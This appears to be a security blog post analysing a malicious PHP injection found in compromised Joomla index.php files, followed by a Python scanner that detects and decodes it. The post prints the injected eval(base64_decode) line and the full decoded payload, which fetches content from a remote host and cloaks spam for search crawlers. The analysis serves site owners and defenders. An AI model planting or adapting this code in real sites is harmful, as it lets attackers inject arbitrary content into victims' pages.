This isn’t particularly new, but is still being injected into some compromised Joomla sites.  In the /index.php file and /administrator/index.php file, the last few lines of legitimate code look like this (at least in 1.5.x):

/**
* RETURN THE RESPONSE
*/
echo JResponse::toString($mainframe->getCfg('gzip'));

The hacked version changes it to this:

/**
* RETURN THE RESPONSE
*/
$JResp = JResponse::toString($mainframe->getCfg('gzip'));
/*rrt*/
eval(base64_decode("DQokY291bnRfdXJsID0gMzA7IC8vyu7[...]mwpOw0KfQ=="));
$JResp = str_ireplace("</head>", "</head>".$code, $JResp);
echo $JResp;

The code basically just alters the output to add spam into the body of the page.  The encoded part (which will vary between hacked versions as it contains a hard-coded URL that the hackers are changing), when decoded, looks like this (I’ve removed the original code comments which were garbled and added my own comments to explain things):

$count_url = 30;
$static = 0;
$id = 1;
$count_s = 5;
$cloaca = 1;
// address will vary as hackers cycle through hosts
$host = "http://dnsservertest1.com/index.php";

// complete URL: http://dnsservertest1.com/index.php?count=30&static=0&id=1&count_s=5
$url = $host."?count=".$count_url."&static=".$static."&id=".$id."&count_s=".$count_s;

// downloads the contents of $url using PHP's file_get_contents() built-in function
function geturl_1($url)
{
return file_get_contents($url);
}

// downloads $url using PHP network socket functions
function geturl_2( $sock,$host, $path, $query )
{
fputs($sock, "GET " . $path . "?" . $query . "  HTTP/1.0\r\n" .
"Host: $host\r\n" .
"User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3\r\n" .
"Accept: */*\r\n" .
"Accept-Language: en-us,en;q=0.5\r\n" .
"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n" .
"Keep-Alive: 300\r\n" .
"Connection: keep-alive\r\n" .
"Referer: http://$host\r\n\r\n");
while ( $line = fread( $sock, 4096 ) )
{
$response .= $line;
}
fclose( $sock );
$pos      = strpos($response, "\r\n\r\n");
$response = substr($response, $pos + 4);
return $response;
}

// downloads $url using PHP's curl functions
function geturl_3($url)
{
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, FALSE);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
$result = curl_exec($ch);
curl_close($ch);
return $result;
}

// checks the User-Agent string for the Google, Yahoo (Slurp) and Microsoft (msnbot) crawlers.
// note: stripos() returns 0 (which is falsy) for a match at offset 0, so a User-Agent
// that begins with one of these names is not detected by this check
function getuseragent($useragent)
{
if( stripos($useragent, 'googlebot') || stripos($useragent, 'slurp') || stripos($useragent, 'msnbot'))
{
return 1;
}
return 0;
}

// fetches $url by the first method available: file_get_contents() if allow_url_fopen is on,
// otherwise a raw socket to port 80 (the scheme in $url is ignored), otherwise curl;
// the fetched content is echoed, i.e. it ends up in the output buffer
function mainwork($url)
{
if( ini_get("allow_url_fopen") == 1)
{
echo geturl_1($url);
}
else
{
$url_1 = parse_url($url);
if($sock = @fsockopen($url_1['host'], 80))
{
echo geturl_2( $sock, $url_1['host'], $url_1['path'], $url_1['query'] );
}
elseif( @function_exists('curl_init') )
{
echo geturl_3($url);
}
}
}

// cloaking: with $cloaca set, the spam is fetched only for requests whose User-Agent looks like
// a Google/Yahoo/Bing crawler, so normal visitors never see it; with $cloaca == 0 everyone gets it
if( $cloaca && getuseragent($_SERVER['HTTP_USER_AGENT']) )
{
mainwork($url);
}
elseif($cloaca == 0)
{
mainwork($url);
}

In a nutshell, the code downloads whatever is present at the hard-coded URL and inserts it right after the </head> tag of the page Joomla is about to send; when the cloaking flag is set, only search-engine crawlers receive it.  It has been used to display spam links, but because the content is fetched from the remote host on every request, what gets injected can change at any time without any further change to your files.  This code obviously targets Joomla and is inserted into specific files.  It is not difficult to clean up, but the bigger question is how the hackers inserted it in the first place.  If you have found it in your files and are unsure how to continue, contact us for professional incident response!
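To find and triage this injection across a site, here is an added Python scanner (example code written for this post, not part of Joomla or of the malware): it locates eval(base64_decode("...")) in a PHP file, decodes the payload, pulls out the $host and $cloaca values, and checks for the accompanying str_ireplace() on </head>. The sample index.php tail and the payload it scans are constructed inline; spam-host.invalid is a placeholder, not a host seen in the wild, and the function and variable names are my own.

```python
import base64
import os
import re

# Signature of the injection described above: an eval() wrapped around a
# base64_decode() of a single literal string.
EVAL_B64_RE = re.compile(
    r'eval\s*\(\s*base64_decode\s*\(\s*["\']([A-Za-z0-9+/=\s]*)["\']\s*\)\s*\)',
    re.IGNORECASE,
)
# Inside the decoded payload: the hard-coded spam host and the cloaking flag.
HOST_RE = re.compile(r'\$host\s*=\s*["\']([^"\']+)["\']')
CLOACA_RE = re.compile(r'\$cloaca\s*=\s*(\d+)\s*;')
# Outside the payload: the splice of the fetched content right after </head>.
HEAD_SPLICE_RE = re.compile(r'str_ireplace\s*\(\s*["\']</head>["\']', re.IGNORECASE)


def decode_payload(blob):
    """Return the base64-decoded payload as text, or None if it is not valid base64.

    latin-1 never fails to decode, which matters here: real payloads carry
    comments in a non-UTF-8 code page (the garbled comments the post mentions).
    """
    compact = re.sub(r"\s+", "", blob)
    try:
        raw = base64.b64decode(compact, validate=True)
    except ValueError:
        return None
    return raw.decode("latin-1")


def find_injections(php_source):
    """Find eval(base64_decode(...)) blocks in PHP source and summarise each one."""
    findings = []
    for match in EVAL_B64_RE.finditer(php_source):
        payload = decode_payload(match.group(1))
        cloaca = CLOACA_RE.search(payload) if payload else None
        findings.append({
            "offset": match.start(),
            "decoded": payload,
            "hosts": HOST_RE.findall(payload) if payload else [],
            "cloaked": bool(cloaca and cloaca.group(1) != "0"),
            "patches_head": bool(HEAD_SPLICE_RE.search(php_source)),
        })
    return findings


def scan_joomla_root(root):
    """Check the two files this variant targets, relative to a Joomla install root."""
    results = {}
    for rel in ("index.php", os.path.join("administrator", "index.php")):
        path = os.path.join(root, rel)
        if os.path.isfile(path):
            with open(path, encoding="latin-1") as fh:
                results[rel] = find_injections(fh.read())
    return results


# --- constructed sample files, not real captures ---
CLEAN_TAIL = """<?php
/**
* RETURN THE RESPONSE
*/
echo JResponse::toString($mainframe->getCfg('gzip'));
"""

# A cut-down stand-in for the decoded payload; the host is a placeholder.
CONSTRUCTED_PAYLOAD = (
    "\r\n$count_url = 30;\r\n$cloaca = 1;\r\n"
    '$host = "http://spam-host.invalid/index.php";\r\n'
    "if ($cloaca && stripos($_SERVER['HTTP_USER_AGENT'], 'googlebot')) {\r\n"
    "    echo file_get_contents($host);\r\n}\r\n"
)
ENCODED_PAYLOAD = base64.b64encode(CONSTRUCTED_PAYLOAD.encode("latin-1")).decode("ascii")

HACKED_TAIL = CLEAN_TAIL.replace(
    "echo JResponse::toString($mainframe->getCfg('gzip'));",
    "$JResp = JResponse::toString($mainframe->getCfg('gzip'));\n"
    "/*rrt*/\n"
    'eval(base64_decode("' + ENCODED_PAYLOAD + '"));\n'
    '$JResp = str_ireplace("</head>", "</head>".$code, $JResp);\n'
    "echo $JResp;",
)

if __name__ == "__main__":
    for hit in find_injections(HACKED_TAIL):
        print("injection at byte %d, hosts=%s, cloaked=%s, splices </head>=%s"
              % (hit["offset"], hit["hosts"], hit["cloaked"], hit["patches_head"]))
```

Point scan_joomla_root() at the install directory (for example scan_joomla_root('/var/www/joomla')) to check both files this variant modifies. The scanner only matches this one pattern, so treat a clean result as a starting point rather than a verdict: diff the whole tree against a pristine copy of the same Joomla version, and keep the decoded $host values, since they tell you which remote server was feeding the spam and can be blocked at the egress firewall while the root cause is investigated.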